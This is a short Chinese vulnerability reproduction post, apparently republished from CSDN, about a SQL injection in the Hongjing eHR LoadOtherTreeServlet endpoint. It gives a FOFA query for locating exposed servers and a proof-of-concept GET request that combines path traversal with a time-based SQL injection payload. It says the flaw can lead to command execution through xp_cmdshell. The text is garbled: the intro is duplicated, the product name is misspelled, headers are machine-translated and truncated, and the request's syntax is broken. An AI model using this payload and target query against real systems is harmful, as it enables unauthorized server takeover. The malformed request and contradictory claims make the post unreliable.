宏景eHR LoadOtherTreeServlet SQL注入漏洞复现(宏景系统)

宏景eHR LoadOtherTreeServlet SQL注入漏洞复现0x01 产品简介
宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。
0x02 漏洞概述
宏景eHR

0x01 产品简介

宏晶eHR人力资源管理软件是一款集成人力资源管理和数字化应用的软件,以满足动态、协作、流程导向的战略需求。

0x02 漏洞概述

Honjing eHR LoadOtherTreeServlet 接口包含SQL 注入漏洞,可能允许未经身份验证的远程攻击者与数据库xp_cmdshell 交互以执行任意命令并控制服务器。经分析判断,该漏洞利用难度较大,建议您尽快修复。

0x03 复现环境

FOFA:app=\’HJSOFT-HCM\’

0x04 漏洞复现

示范实验

GET /w_selfservice/oauthservlet/%2e./.%2e/gz/LoadOtherTreeServlet?modelflag=4budget_id=1%29%3BWAITFOR+DELAY+%270%3A0%3A5%27–flag=1 HTTP/1.1

Host:你的IP

用户代理: Mozil

#宏景eHR LoadOtherTreeServlet 以上有关SQL注入漏洞复现的相关内容由网络提供,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92886.html

(0)
CSDN's avatarCSDN
上一篇 2024年7月4日 下午4:36
下一篇 2024年7月4日 下午4:36

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注